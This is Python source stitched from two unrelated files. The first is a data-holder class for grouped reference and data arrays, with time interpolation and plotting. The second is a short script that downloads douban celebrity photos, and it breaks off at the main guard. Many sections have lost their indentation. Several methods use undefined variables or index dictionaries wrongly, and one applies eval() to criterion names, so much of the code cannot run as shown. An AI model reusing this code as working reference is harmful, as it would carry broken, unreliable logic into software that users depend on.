msg += " 'g1':{'t2':{'data':t2, 'units':'min'}}}\n\n"
msg += " - keys = ref, values = {data, group}:\n"
msg += " {'t0':{'data':t0, 'units':'s', 'group':'g0'},\n"
msg += " 't1':{'data':t1, 'units':'h', 'group':'g0'},\n"
msg += " 't2':{'data':t2, 'units':'min', 'group':'g1'}"
raise Exception(msg)
if cA:
# Convert to cB
drbis = {}
for k0, v0 in dref.items():
for k1, v1 in v0.items():
if isinstance(v1, dict):
drbis[k1] = v1
drbis['group'] = k0
else:
drbis[k1] = {'data': v1, 'group': k0}
dref = drbis
# Check cB
for kk, vv in dref.items():
# Check if new group
if vv['group'] not in self._dgroup['lkey']:
self._dgroup['dict'][vv['group']] = {}
self._dgroup['lkey'].append(vv['group'])
# Check key unicity
if kk in self._ddata['lkey']:
msg = "key '%s' already used !\n"%kk
msg += " => each key must be unique !"
raise Exception(msg)
# Check data
c0 = 'data' in vv.keys()
data = vv['data']
if not isinstance(data, np.ndarray):
if isinstance(data, list) or isinstance(data, tuple):
try:
data = np.atleast_1d(data).ravel()
size = data.size
except Exception as err:
c0 = False
else:
size = data.__class__.__name__
else:
if data.ndim != 1:
data = np.atleast_1d(data).ravel()
size = data.size
if not c0:
msg = "dref[%s]['data'] must be array-convertible\n"%kk
msg += "The following array conversion failed:\n"
msg += " - np.atleast_1d(dref[%s]['data']).ravel()"%kk
raise Exception(msg)
# Fill self._dref
self._dref['dict'][kk] = {'size': size, 'group': vv['group']}
self._dref['lkey'].append(kk)
# Extract and check parameters
dparams = self._extract_known_params(kk, vv)
# Fill self._ddata
self._ddata['dict'][kk] = dict(data=data, refs=(kk,),
shape=(size,), **dparams)
self._ddata['lkey'].append(kk)
# ------------- DB (start)
def __repr__(self):
return self.__class__.__name__
# ------------- DB (end)
    def _checkformat_ddata(self, ddata):
        """Validate ddata entries and register them in self._ddata.

        Each value must be a dict with at least 'refs' (tuple of known
        ref keys) and 'data'; data shape must match the sizes of its refs.
        """
        c0 = isinstance(ddata, dict)
        c0 = c0 and all([isinstance(kk, str) for kk in ddata.keys()])
        if not c0:
            msg = "Provided ddata must be dict !\n"
            msg += "All its keys must be str !"
            raise Exception(msg)
        # Start check on each key
        for kk, vv in ddata.items():
            # Check value is a dict with proper keys
            c0 = isinstance(vv, dict)
            c0 = c0 and 'refs' in vv.keys() and isinstance(vv['refs'], tuple)
            c0 = c0 and 'data' in vv.keys()
            if not c0:
                msg = "ddata must contain dict with at least the keys:\n"
                msg += "    - 'refs': a tuple indicating refs dependencies\n"
                msg += "    - 'data': a 1d array containing the data"
                raise Exception(msg)
            # Check key unicity
            if kk in self._ddata['lkey']:
                msg = "key '%s' already used !\n"%kk
                msg += "  => each key must be unique !"
                raise Exception(msg)
            # Extract data and shape
            data = vv['data']
            if not isinstance(data, np.ndarray):
                if isinstance(data, list) or isinstance(data, tuple):
                    try:
                        data = np.asarray(data)
                        shape = data.shape
                    except Exception as err:
                        # NOTE(review): an assert inside the except is used
                        # as error handling here -- ragged lists fall back
                        # to a 1d shape of their length; confirm intent.
                        assert type(data) in [list, tuple]
                        shape = (len(data),)
                else:
                    # Non-sequence scalars keep their class name as "shape".
                    shape = data.__class__.__name__
            else:
                data = np.atleast_1d(np.squeeze(data))
                shape = data.shape
            # Check proper ref (existence and shape / size)
            for ii, rr in enumerate(vv['refs']):
                if rr not in self._dref['lkey']:
                    msg = "ddata[%s] depends on an unknown ref !\n"%kk
                    msg += "    - ddata[%s]['refs'] = %s\n"%(kk, rr)
                    msg += "      => %s not in self.dref !\n"%rr
                    msg += "      => self.add_ref( %s ) first !"%rr
                    raise Exception(msg)
            shaprf = tuple(self._dref['dict'][rr]['size'] for rr in vv['refs'])
            if not shape == shaprf:
                msg = "Inconsistency between data shape and ref size !\n"
                msg += "    - ddata[%s]['data'] shape: %s\n"%(kk, str(shape))
                msg += "    - sizes of refs: %s"%(str(shaprf))
                raise Exception(msg)
            # Extract params and set self._ddata
            dparams = self._extract_known_params(kk, vv)
            self._ddata['dict'][kk] = dict(data=data, refs=vv['refs'],
                                           shape=shape, **dparams)
            self._ddata['lkey'].append(kk)
def _complement_dgrouprefdata(self):
# --------------
# ddata
assert len(self._ddata['lkey']) == len(self._ddata['dict'].keys())
for k0 in self._ddata['lkey']:
v0 = self._ddata['dict'][k0]
# Check all ref are in dref
lrefout = [ii for ii in v0['refs'] if ii not in self._dref['lkey']]
if len(lrefout) != 0:
msg = "ddata[%s]['refs'] has keys not in dref:\n"%k0
msg += " - " + "\n - ".join(lrefout)
raise Exception(msg)
# set group
grps = tuple(self._dref['dict'][rr]['group'] for rr in v0['refs'])
gout = [gg for gg in grps if gg not in self._dgroup['lkey']]
if len(gout) > 0:
lg = self._dgroup['lkey']
msg = "Inconsistent grps from self.ddata[%s]['refs']:\n"%k0
msg += " - grps = %s\n"%str(grps)
msg += " - self._dgroup['lkey'] = %s\n"%str(lg)
msg += " - self.dgroup.keys() = %s"%str(self.dgroup.keys())
raise Exception(msg)
self._ddata['dict'][k0]['group'] = grps
# --------------
# dref
for k0 in self._dref['lkey']:
ldata = [kk for kk in self._ddata['lkey']
if k0 in self._ddata['dict'][kk]['refs']]
self._dref['dict'][k0]['ldata'] = ldata
assert self._dref['dict'][k0]['group'] in self._dgroup['lkey']
# --------------
# dgroup
for gg in self._dgroup['lkey']:
vg = self._dgroup['dict'][gg]
lref = [rr for rr in self._dref['lkey']
if self._dref['dict'][rr]['group'] == gg]
ldata = [dd for dd in self._ddata['lkey']
if any([dd in self._dref['dict'][vref]['ldata']
for vref in lref])]
# assert vg['depend'] in lidindref
self._dgroup['dict'][gg]['lref'] = lref
self._dgroup['dict'][gg]['ldata'] = ldata
# --------------
# params
lparam = self._ddata['lparam']
for kk in self._ddata['lkey']:
for pp in self._ddata['dict'][kk].keys():
if pp not in self._reserved_all and pp not in lparam:
lparam.append(pp)
for kk in self._ddata['lkey']:
for pp in lparam:
if pp not in self._ddata['dict'][kk].keys():
self._ddata[kk][pp] = None
self._ddata['lparam'] = lparam
###########
    # Get keys of dictionaries
###########
@staticmethod
def _get_keys_dgroup():
lk = [('lkey', []), ('dict', {})]
return lk
@staticmethod
def _get_keys_dref():
lk = [('lkey', []), ('dict', {})]
return lk
@staticmethod
def _get_keys_ddata():
lk = [('lkey', []), ('dict', {}), ('lparam', [])]
return lk
###########
# _init
###########
def _init(self, dref=None, ddata=None, **kwargs):
kwdargs = dict(dref=dref, ddata=ddata, **kwargs)
largs = self._get_largs_dref()
kwddref = self._extract_kwdargs(kwdargs, largs)
self._set_dref(complement=False, **kwddref)
largs = self._get_largs_ddata()
kwddata = self._extract_kwdargs(kwdargs, largs)
self._set_ddata(**kwddata)
self._dstrip['strip'] = 0
###########
# set dictionaries
###########
def _set_dref(self, dref, complement=True):
self._checkformat_dref(dref)
if complement:
self._complement_dgrouprefdata()
def _set_ddata(self, ddata):
self._checkformat_ddata(ddata)
self._complement_dgrouprefdata()
# ---------------------
# Methods for adding ref / quantities
# ---------------------
def add_ref(self, key, data=None, group=None, **kwdargs):
""" Add a reference """
self._set_dref({key: dict(data=data, group=group, **kwdargs)})
    def remove_ref(self, key):
        """ Remove a reference (all data depending on it are removed too) """
        assert key in self._dref['lkey']
        # Snapshot the dependent data keys before deleting the ref
        lkdata = self._dref['dict'][key]['ldata']
        del self._dref['dict'][key]
        self._dref['lkey'].remove(key)
        for kk in lkdata:
            # Only remove data that depended exclusively on this ref
            if self._ddata['dict'][kk]['refs'] == (key,):
                del self._ddata['dict'][kk]
                self._ddata['lkey'].remove(kk)
        # Rebuild group/ref/data cross-links after the deletion
        self._complement_dgrouprefdata()
def add_data(self, key, data=None, ref=None, **kwdargs):
""" Add a data (all associated ref must be added first)) """
self._set_ddata({key: dict(data=data, ref=ref, **kwdargs)})
def remove_data(self, key, propagate=True):
""" Remove a data
Any associated ref reated to this data only is removed too (useless)
"""
if key in self._dref.keys():
self.remove_ref(key)
else:
assert key in self._ddata['dict'].keys()
if propagate:
# Check if associated ref shall be removed too
lref = self._ddata['dict'][key]['refs']
for kref in lref:
# Remove if key was the only associated data
if self._dref['dict'][kref]['ldata'] == [key]:
self.remove_ref(kref)
del self._ddata['dict'][key]
self._ddata['lkey'].remove(key)
self._lkdata.remove(key)
self._complement_dgrouprefdata()
###########
# strip dictionaries
###########
    def _strip_ddata(self, strip=0, verb=0):
        # Placeholder: stripping of ddata is not implemented yet
        pass
###########
# _strip and get/from dict
###########
    @classmethod
    def _strip_init(cls):
        """ Declare the allowed strip levels and patch strip.__doc__ """
        cls._dstrip['allowed'] = [0, 1]
        nMax = max(cls._dstrip['allowed'])
        doc = """
                 1: None
               """
        # NOTE(review): utils is assumed to be the tofu utils module
        # imported at file level — confirm
        doc = utils.ToFuObjectBase.strip.__doc__.format(doc, nMax)
        cls.strip.__doc__ = doc

    def strip(self, strip=0, verb=True):
        # Delegate to the base-class strip machinery
        super(DataHolder, self).strip(strip=strip, verb=verb)

    def _strip(self, strip=0, verb=True):
        # Only ddata supports stripping in this class
        self._strip_ddata(strip=strip, verb=verb)
def _to_dict(self):
dout = {'dgroup': {'dict': self._dgroup, 'lexcept': None},
'dref': {'dict': self._dref, 'lexcept': None},
'ddata': {'dict': self._ddata, 'lexcept': None}}
return dout
def _from_dict(self, fd):
self._dgroup.update(**fd['dgroup'])
self._dref.update(**fd['dref'])
self._ddata.update(**fd['ddata'])
self._complement_dgrouprefdata()
###########
# properties
###########
    @property
    def dconfig(self):
        """ The dict of configs """
        return self._dconfig
    @property
    def dgroup(self):
        """ The dict of groups """
        return self._dgroup['dict']
    @property
    def lgroup(self):
        """ The list of group keys """
        return self._dgroup['lkey']
    @property
    def dref(self):
        """ The dict of references """
        return self._dref['dict']
    @property
    def lref(self):
        """ The list of reference keys """
        return self._dref['lkey']
    @property
    def ddata(self):
        """ The dict of data """
        return self._ddata['dict']
    @property
    def ldata(self):
        """ The list of data keys """
        return self._ddata['lkey']
    @property
    def lparam(self):
        """ The list of declared parameter names """
        return self._ddata['lparam']
# ---------------------
# Add / remove params
# ---------------------
# UP TO HERE
def get_param(self, param=None, returnas=np.ndarray):
# Check inputs and trivial cases
if param is None:
return
assert param in self._ddata['lparam']
assert returnas in [np.ndarray, dict, list]
# Get output
if returnas == dict:
out = {kk: self._ddata['dict'][kk][param]
for kk in self._ddata['lkey']}
else:
out = [self._ddata['dict'][kk][param]
for kk in self._ddata['lkey']]
if returnas == np.ndarray:
try:
out = np.asarray(out)
except Exception as err:
msg = "Could not convert %s to array !"
warnings.warn(msg)
return out
def set_param(self, param=None, values=None, ind=None, key=None):
# Check and format input
if param is None:
return
assert param in self._ddata['lparam']
# Update all keys with common value
ltypes = [str, int, np.int, float, np.float, tuple]
lc = [any([isinstance(values, tt) for tt in ltypes]),
isinstance(values, list), isinstance(values, np.ndarray)]
if not any(lc):
msg = "Accepted types for values include:\n"
msg += " - %s: common to all\n"%str(ltypes)
msg += " - list, np.ndarray: key by key"
raise Exception(msg)
if lc0:
key = self._ind_tofrom_key(ind=ind, key=key, out='key')
for kk in key:
self._ddata['dict'][kk][param] = values
# Update relevant keys with corresponding values
else:
key = self._ind_tofrom_key(ind=ind, key=key, out='key')
assert len(key) == len(values)
for kk in range(len(key)):
self._ddata['dict'][key[ii]][param] = values[ii]
def add_param(self, param, values=None):
assert isinstance(param, str)
assert param not in self._ddata['lparam']
self._ddata['lparam'].append(param)
self.set_param(param=param, values=values)
def remove_param(self, param=None):
# Check and format input
if param is None:
return
assert param in self._ddata['lparam']
self._ddata['lparam'].remove(param)
for kk in self._ddata['lkey']:
del self._ddata['dict'][kk][param]
# ---------------------
# Read-only for internal use
# ---------------------
def select(self, group=None, ref=None, log='all', return_key=True,
**kwdargs):
""" Return the indices / keys of data matching criteria
The selection is done comparing the value of all provided parameters
The result is a boolean indices array, optionally with the keys list
It can include:
- log = 'all': only the data matching all criteria
- log = 'any': the data matching any criterion
If log = 'raw', a dict of indices arrays is returned, showing the
details for each criterion
"""
# Format and check input
assert log in ['all', 'any', 'raw']
if log == 'raw':
assert not return_key
# Get list of relevant criteria
lk = ['group', 'ref'] + list(kwdargs.keys())
lcrit = [ss for ss in lk if ss is not None]
ncrit = len(lcrit)
# Prepare array of bool indices and populate
ind = np.ones((ncrit, len(self._ddata['lkey'])), dtype=bool)
for ii in range(ncrit):
critval = eval(lcrit[ii])
try:
par = self.get_param(lcrit[ii], returnas=np.ndarray)
ind[ii, :] = par == critval
except Exception as err:
ind[ii, :] = [self._ddata['dict'][kk][param] == critval
for kk in self.__lkata]
# Format output ind
if log == 'all':
ind = np.all(ind, axis=0)
elif log == 'any':
ind = np.any(ind, axis=0)
else:
ind = {lcrit[ii]: ind[ii, :] for ii in range(ncrit)}
# Also return the list of keys if required
if return_key:
if np.any(ind):
out = ind, lid[ind.nonzero()[0]]
else:
out = ind, np.array([], dtype=int)
else:
out = ind
return out
def _ind_tofrom_key(self, ind=None, key=None, returnas=int):
# Check / format input
assert returnas in [int, bool, 'key']
lc = [ind is not None, key is not None]
assert np.sum(lc) <= 1
# Initialize output
out = np.zeros((len(self._ddata['lkey']),), dtype=bool)
# Test
if lc[0]:
ind = np.atleast_1d(ind).ravel()
assert ind.dtype == np.int or ind.dtype == np.bool
out[ind] = True
if returnas in [int, 'key']:
out = out.nonzero()[0]
if returnas == 'key':
out = [self._ddata['lkey'][ii] for ii in out]
elif lc[1]:
if isinstance(key, str):
key = [key]
if returnas == 'key':
out = key
else:
for kk in key:
out[self._ddata['lkey'].index(kk)] = True
if returnas == int:
out = out.nonzero()[0]
else:
if returnas == bool:
out[:] = True
elif returnas == int:
out = np.arange(0, len(self._ddata['lkey']))
else:
out = self._ddata['lkey']
return out
# ---------------------
# Methods for showing data
# ---------------------
def get_summary(self, show=None, show_core=None,
sep=' ', line='-', just='l',
table_sep=None, verb=True, return_=False):
""" Summary description of the object content """
# # Make sure the data is accessible
# msg = "The data is not accessible because self.strip(2) was used !"
# assert self._dstrip['strip']<2, msg
# -----------------------
# Build for groups
col0 = ['group name', 'nb. ref', 'nb. data']
ar0 = [(k0,
len(self._dgroup['dict'][k0]['lref']),
len(self._dgroup['dict'][k0]['ldata']))
for k0 in self._dgroup['lkey']]
# -----------------------
# Build for refs
col1 = ['ref key', 'group', 'size', 'nb. data']
ar1 = [(k0,
self._dref['dict'][k0]['group'],
self._dref['dict'][k0]['size'],
len(self._dref['dict'][k0]['ldata']))
for k0, v0 in self._dref['lkey']]
# -----------------------
# Build for ddata
col2 = ['data key']
if show_core is None:
show_core = self._show_in_summary_core
if isinstance(show_core, str):
show_core = [show_core]
lkcore = ['shape', 'group', 'ref']
assert all([ss in self._lparams + lkcore for ss in show_core])
col2 += show_core
if show is None:
show = self._show_in_summary
if show == 'all':
col2 += self._lparams
else:
if isinstance(show, str):
show = [show]
assert all([ss in self._lparams for ss in show])
col2 += show
ar2 = []
for k0 in self._lkdata:
v0 = self._ddata[k0]
lu = [k0] + [str(v0[cc]) for cc in col2[1:]]
ar2.append(lu)
return self._get_summary(
[ar0, ar1, ar2], [col0, col1, col2],
sep=sep, line=line, table_sep=table_sep,
verb=verb, return_=return_)
# ---------------------
# Method for interpolating on ref
# ---------------------
    def get_time_common(self, lkeys, choose=None):
        """ Return the common time vector to several quantities

        If they do not have a common time vector, a reference one is chosen
        according to criterion choose ('min' = finest mean resolution).

        Returns
        -------
        dout :  dict
            {key: {'t': time-vector key}} for each input key
        dtu :   dict
            {time-vector key: {'ldata': [keys sharing it]}}
        tref :  str
            Key of the chosen reference time vector
        """
        # Check all data have time-dependency
        # NOTE(review): self.get_time is defined elsewhere — assumed to
        # return the time-vector key of a quantity
        dout = {kk: {'t': self.get_time(kk)} for kk in lkeys}
        dtu = dict.fromkeys(set([vv['t'] for vv in dout.values()]))
        for kt in dtu.keys():
            dtu[kt] = {'ldata': [kk for kk in lkeys if dout[kk]['t'] == kt]}
        if len(dtu) == 1:
            tref = list(dtu.keys())[0]
        else:
            # Mean time step of each candidate time vector
            lt, lres = zip(*[(kt, np.mean(np.diff(self._ddata[kt]['data'])))
                             for kt in dtu.keys()])
            if choose is None:
                choose = 'min'
            # NOTE(review): tref is unbound if choose != 'min' — any other
            # value would raise NameError below; confirm intended values
            if choose == 'min':
                tref = lt[np.argmin(lres)]
        return dout, dtu, tref
    @staticmethod
    def _get_time_common_arrays(dins, choose=None):
        """ Like get_time_common(), but for raw {'val', 't'} array inputs

        dins maps keys to {'val': np.ndarray, 't': np.ndarray}; time
        vectors that compare np.allclose are merged under a single id.

        Returns (dout, dtu, tref) where time vectors are keyed by id().
        """
        dout = dict.fromkeys(dins.keys())
        dtu = {}
        for k, v in dins.items():
            # Validate each entry: 'val' and 't' arrays, compatible sizes
            c0 = type(k) is str
            c0 = c0 and all([ss in v.keys() for ss in ['val', 't']])
            c0 = c0 and all([type(v[ss]) is np.ndarray for ss in ['val', 't']])
            c0 = c0 and v['t'].size in v['val'].shape
            if not c0:
                msg = "dins must be a dict of the form (at least):\n"
                msg += "    dins[%s] = {'val': np.ndarray,\n"%str(k)
                msg += "                't':   np.ndarray}\n"
                msg += "Provided: %s"%str(dins)
                raise Exception(msg)
            # Use the time array's id() as key; merge numerically-equal ones
            kt, already = id(v['t']), True
            if kt not in dtu.keys():
                lisclose = [kk for kk, vv in dtu.items()
                            if (vv['val'].shape == v['t'].shape
                                and np.allclose(vv['val'], v['t']))]
                assert len(lisclose) <= 1
                if len(lisclose) == 1:
                    kt = lisclose[0]
                else:
                    already = False
                    dtu[kt] = {'val': np.atleast_1d(v['t']).ravel(),
                               'ldata': [k]}
            if already:
                dtu[kt]['ldata'].append(k)
            assert dtu[kt]['val'].size == v['val'].shape[0]
            dout[k] = {'val': v['val'], 't': kt}
        if len(dtu) == 1:
            tref = list(dtu.keys())[0]
        else:
            # Pick the reference time vector per the choose criterion
            lt, lres = zip(*[(kt, np.mean(np.diff(dtu[kt]['val'])))
                             for kt in dtu.keys()])
            if choose is None:
                choose = 'min'
            # NOTE(review): tref unbound if choose != 'min' — confirm
            if choose == 'min':
                tref = lt[np.argmin(lres)]
        return dout, dtu, tref
def _interp_on_common_time(self, lkeys,
choose='min', interp_t=None, t=None,
fill_value=np.nan):
""" Return a dict of time-interpolated data """
dout, dtu, tref = self.get_time_common(lkeys)
if type(t) is np.ndarray:
tref = np.atleast_1d(t).ravel()
tr = tref
ltu = dtu.keys()
else:
if type(t) is str:
tref = t
tr = self._ddata[tref]['data']
ltu = set(dtu.keys())
if tref in dtu.keys():
ltu = ltu.difference([tref])
if interp_t is None:
interp_t = _INTERPT
# Interpolate
for tt in ltu:
for kk in dtu[tt]['ldata']:
dout[kk]['val'] = scpinterp.interp1d(self._ddata[tt]['data'],
self._ddata[kk]['data'],
kind=interp_t, axis=0,
bounds_error=False,
fill_value=fill_value)(tr)
if type(tref) is not np.ndarray and tref in dtu.keys():
for kk in dtu[tref]['ldata']:
dout[kk]['val'] = self._ddata[kk]['data']
return dout, tref
def _interp_on_common_time_arrays(self, dins,
choose='min', interp_t=None, t=None,
fill_value=np.nan):
""" Return a dict of time-interpolated data """
dout, dtu, tref = self._get_time_common_arrays(dins)
if type(t) is np.ndarray:
tref = np.atleast_1d(t).ravel()
tr = tref
ltu = dtu.keys()
else:
if type(t) is str:
assert t in dout.keys()
tref = dout[t]['t']
tr = dtu[tref]['val']
ltu = set(dtu.keys()).difference([tref])
if interp_t is None:
interp_t = _INTERPT
# Interpolate
for tt in ltu:
for kk in dtu[tt]['ldata']:
dout[kk]['val'] = scpinterp.interp1d(dtu[tt]['val'],
dout[kk]['val'],
kind=interp_t, axis=0,
bounds_error=False,
fill_value=fill_value)(tr)
return dout, tref
    def interp_t(self, dkeys,
                 choose='min', interp_t=None, t=None,
                 fill_value=np.nan):
        """ Interpolate a mixed set of quantities onto a common time base

        dkeys is a list of data keys, or a dict {key: {'val': str-or-array}}
        mixing stored quantities (str) and raw arrays (np.ndarray).
        Returns (dout, tref).
        """
        # Check inputs
        assert type(dkeys) in [list, dict]
        if type(dkeys) is list:
            dkeys = {kk: {'val': kk} for kk in dkeys}
        lc = [(type(kk) is str
               and type(vv) is dict
               and type(vv.get('val', None)) in [str, np.ndarray])
              for kk, vv in dkeys.items()]
        assert all(lc), str(dkeys)
        # Separate by type: dk0 = stored keys, dk1 = raw arrays
        dk0 = dict([(kk, vv) for kk, vv in dkeys.items()
                    if type(vv['val']) is str])
        dk1 = dict([(kk, vv) for kk, vv in dkeys.items()
                    if type(vv['val']) is np.ndarray])
        assert len(dkeys) == len(dk0) + len(dk1), str(dk0) + '\n' + str(dk1)
        if len(dk0) == len(dkeys):
            # All stored quantities
            lk = [v['val'] for v in dk0.values()]
            dout, tref = self._interp_on_common_time(lk, choose=choose,
                                                     t=t, interp_t=interp_t,
                                                     fill_value=fill_value)
            # Re-key the result on the caller-provided keys
            dout = {kk: {'val': dout[vv['val']]['val'],
                         't': dout[vv['val']]['t']}
                    for kk, vv in dk0.items()}
        elif len(dk1) == len(dkeys):
            # All raw arrays
            dout, tref = self._interp_on_common_time_arrays(
                dk1, choose=choose, t=t,
                interp_t=interp_t, fill_value=fill_value)
        else:
            # Mixed case
            lk = [v['val'] for v in dk0.values()]
            if type(t) is np.ndarray:
                # Explicit time vector: interpolate both halves on it
                # NOTE(review): unlike the all-str branch, dout is not
                # re-keyed on the caller keys here — confirm intended
                dout, tref = self._interp_on_common_time(
                    lk, choose=choose, t=t,
                    interp_t=interp_t, fill_value=fill_value)
                dout1, _ = self._interp_on_common_time_arrays(
                    dk1, choose=choose, t=t,
                    interp_t=interp_t, fill_value=fill_value)
            else:
                # Choose a common reference between the two halves
                dout0, dtu0, tref0 = self.get_time_common(lk,
                                                          choose=choose)
                dout1, dtu1, tref1 = self._get_time_common_arrays(
                    dk1, choose=choose)
                if type(t) is str:
                    lc = [t in dtu0.keys(), t in dout1.keys()]
                    if not any(lc):
                        msg = "if t is str, it must refer to a valid key:\n"
                        msg += "    - %s\n"%str(dtu0.keys())
                        msg += "    - %s\n"%str(dout1.keys())
                        msg += "Provided: %s"%t
                        raise Exception(msg)
                    if lc[0]:
                        t0, t1 = t, self._ddata[t]['data']
                    else:
                        t0, t1 = dtu1[dout1[t]['t']]['val'], t
                    tref = t
                else:
                    if choose is None:
                        choose = 'min'
                    if choose == 'min':
                        # Pick the finer of the two candidate references
                        t0 = self._ddata[tref0]['data']
                        t1 = dtu1[tref1]['val']
                        dt0 = np.mean(np.diff(t0))
                        dt1 = np.mean(np.diff(t1))
                        # NOTE(review): the swap below mixes keys and
                        # arrays asymmetrically — looks suspicious, confirm
                        if dt0 < dt1:
                            t0, t1, tref = tref0, t0, tref0
                        else:
                            t0, t1, tref = t1, tref1, tref1
                dout, tref = self._interp_on_common_time(
                    lk, choose=choose, t=t0,
                    interp_t=interp_t, fill_value=fill_value)
                dout = {kk: {'val': dout[vv['val']]['val'],
                             't': dout[vv['val']]['t']}
                        for kk, vv in dk0.items()}
                dout1, _ = self._interp_on_common_time_arrays(
                    dk1, choose=choose, t=t1,
                    interp_t=interp_t, fill_value=fill_value)
            dout.update(dout1)
        return dout, tref
    def _get_indtmult(self, idquant=None, idref1d=None, idref2d=None):
        """ Build the union time base of a quantity and its 1d/2d refs

        Returns (tall, tbinall, ntall, indtq, indtr1, indtr2): the merged
        time vector, its bin edges, its size, and for each input the
        digitized index of tall into its own time bins.
        """
        # Get time vectors and bins
        # NOTE(review): assumes 'depend'[0] is the time ref of a quantity
        idtq = self._ddata[idquant]['depend'][0]
        tq = self._ddata[idtq]['data']
        tbinq = 0.5*(tq[1:]+tq[:-1])
        if idref1d is not None:
            idtr1 = self._ddata[idref1d]['depend'][0]
            tr1 = self._ddata[idtr1]['data']
            tbinr1 = 0.5*(tr1[1:]+tr1[:-1])
            if idref2d is not None and idref2d != idref1d:
                idtr2 = self._ddata[idref2d]['depend'][0]
                tr2 = self._ddata[idtr2]['data']
                tbinr2 = 0.5*(tr2[1:]+tr2[:-1])
        # Get tbinall and tall
        if idref1d is None:
            tbinall = tbinq
            tall = tq
        else:
            if idref2d is None:
                tbinall = np.unique(np.r_[tbinq, tbinr1])
            else:
                tbinall = np.unique(np.r_[tbinq, tbinr1, tbinr2])
            # Rebuild time points as the mid-points of the merged bins,
            # extrapolating half a step at both ends
            tall = np.r_[tbinall[0] - 0.5*(tbinall[1]-tbinall[0]),
                         0.5*(tbinall[1:]+tbinall[:-1]),
                         tbinall[-1] + 0.5*(tbinall[-1]-tbinall[-2])]
        # Get indtqr1r2 (tall with respect to tq, tr1, tr2)
        indtq, indtr1, indtr2 = None, None, None
        indtq = np.digitize(tall, tbinq)
        if idref1d is None:
            # Sanity check: with a single time base, digitize is identity
            assert np.all(indtq == np.arange(0, tall.size))
        if idref1d is not None:
            indtr1 = np.digitize(tall, tbinr1)
        if idref2d is not None:
            indtr2 = np.digitize(tall, tbinr2)
        ntall = tall.size
        return tall, tbinall, ntall, indtq, indtr1, indtr2
@staticmethod
def _get_indtu(t=None, tall=None, tbinall=None,
idref1d=None, idref2d=None,
indtr1=None, indtr2=None):
# Get indt (t with respect to tbinall)
indt, indtu = None, None
if t is not None:
indt = np.digitize(t, tbinall)
indtu = np.unique(indt)
# Update
tall = tall[indtu]
if idref1d is not None:
assert indtr1 is not None
indtr1 = indtr1[indtu]
if idref2d is not None:
assert indtr2 is not None
indtr2 = indtr2[indtu]
ntall = tall.size
return tall, ntall, indt, indtu, indtr1, indtr2
    def get_tcommon(self, lq, prefer='finer'):
        """ Check if common t, else choose according to prefer

        By default, prefer the finer time resolution.
        Returns (chosen time key, list of all candidate time keys).
        """
        if type(lq) is str:
            lq = [lq]
        t = []
        for qq in lq:
            # NOTE(review): uses self._dindref, which does not appear in
            # the rest of this class (legacy attribute?) — confirm
            ltr = [kk for kk in self._ddata[qq]['depend']
                   if self._dindref[kk]['group'] == 'time']
            assert len(ltr) <= 1
            if len(ltr) > 0 and ltr[0] not in t:
                t.append(ltr[0])
        assert len(t) >= 1
        if len(t) > 1:
            # Mean time step of each candidate; pick finest or coarsest
            dt = [np.nanmean(np.diff(self._ddata[tt]['data'])) for tt in t]
            if prefer == 'finer':
                ind = np.argmin(dt)
            else:
                ind = np.argmax(dt)
        else:
            ind = 0
        return t[ind], t
def _get_tcom(self, idquant=None, idref1d=None,
idref2d=None, idq2dR=None):
if idquant is not None:
out = self._get_indtmult(idquant=idquant,
idref1d=idref1d, idref2d=idref2d)
else:
out = self._get_indtmult(idquant=idq2dR)
return out
# ---------------------
# Methods for plotting data
# ---------------------
    def plot(self, lquant, X=None,
             ref1d=None, ref2d=None,
             remap=False, res=0.01, interp_space=None,
             sharex=False, bck=True):
        """ Plot the desired quantities (built via self.get_Data) """
        # NOTE(review): self.get_Data is defined elsewhere in the class
        lDat = self.get_Data(lquant, X=X, remap=remap,
                             ref1d=ref1d, ref2d=ref2d,
                             res=res, interp_space=interp_space)
        # Several quantities => combined plot, optionally sharing the x-axis
        if type(lDat) is list:
            kh = lDat[0].plot_combine(lDat[1:], sharex=sharex, bck=bck)
        else:
            kh = lDat.plot(bck=bck)
        return kh
    def plot_combine(self, lquant, lData=None, X=None,
                     ref1d=None, ref2d=None,
                     remap=False, res=0.01, interp_space=None,
                     sharex=False, bck=True):
        """ plot combining several quantities from the Plasma2D itself and
        optional extra list of Data instances """
        lDat = self.get_Data(lquant, X=X, remap=remap,
                             ref1d=ref1d, ref2d=ref2d,
                             res=res, interp_space=interp_space)
        if lData is not None:
            if type(lDat) is list:
                lData = lDat[1:] + lData
            else:
                # NOTE(review): lDat is NOT a list in this branch, so
                # lDat[1:] looks wrong (slicing a Data instance); possibly
                # intended [lDat] + lData — confirm against get_Data()
                lData = lDat[1:] + [lData]
        # NOTE(review): lDat[0] here also assumes lDat is a list — confirm
        kh = lDat[0].plot_combine(lData, sharex=sharex, bck=bck)
        return kh
|
#coding=utf-8
import urllib.request
import re
from bs4 import BeautifulSoup
import os
from tkinter import *
#<span class="thispage" data-total-page="131">1</span>
def download():
    """Download all photos listed on a douban celebrity photos page.

    Reads the base URL from the url_text Entry (falling back to a default),
    walks every result page (30 images per page) and saves each image under
    saveDir as "<page>-<index>.jpg".
    """
    url_head = url_text.get()
    # e.g. https://movie.douban.com/celebrity/1022004/photos/
    saveDir = "D:\\kk\\"
    if not os.path.isdir(saveDir):
        os.makedirs(saveDir)
    if url_head.strip() == '':
        url_head = "https://movie.douban.com/celebrity/1012533/photos/"
    content = urllib.request.urlopen(url_head).read()
    soup = BeautifulSoup(content, "html.parser")
    # <span class="thispage" data-total-page="131">1</span>
    span_all = soup.find_all("span", attrs={'class': 'thispage'})
    total = 0  # number of images actually saved
    for spans in span_all:
        # FIX: the original shadowed the builtin len() with the page count
        n_pages = int(spans.attrs['data-total-page'])
        for y in range(1, n_pages + 1):
            page = (y - 1) * 30
            url = url_head + "?type=C&start=%s&sortby=like&size=a&subtype=a" % page
            content = urllib.request.urlopen(url).read()
            soup = BeautifulSoup(content, "html.parser")
            img_all = soup.find_all("img", src=re.compile('.doubanio.com/view/photo'))
            print("正下载第%s页" % y)
            x = 30 * y
            for img in img_all:
                img_str = img["src"]
                img_name = "%s-%s.jpg" % (y, x)
                path = saveDir + img_name  # image save path (保存图片路径)
                urllib.request.urlretrieve(img_str, path)
                x += 1
                total += 1
            # FIX: removed the stray manual y += 1, which fought the for-loop
    # FIX: the original '"%s..." % x * y' repeated the *string* y times due
    # to operator precedence; report the real download count instead
    print("已下载%s张图片" % total)
def windowExit():
    """Close the Tk window and terminate the process."""
    # FIX: sys was never imported at module level, so sys.exit() raised
    # NameError; import locally to keep the change self-contained
    import sys
    window.destroy()
    sys.exit()
if __name__ == '__main__':
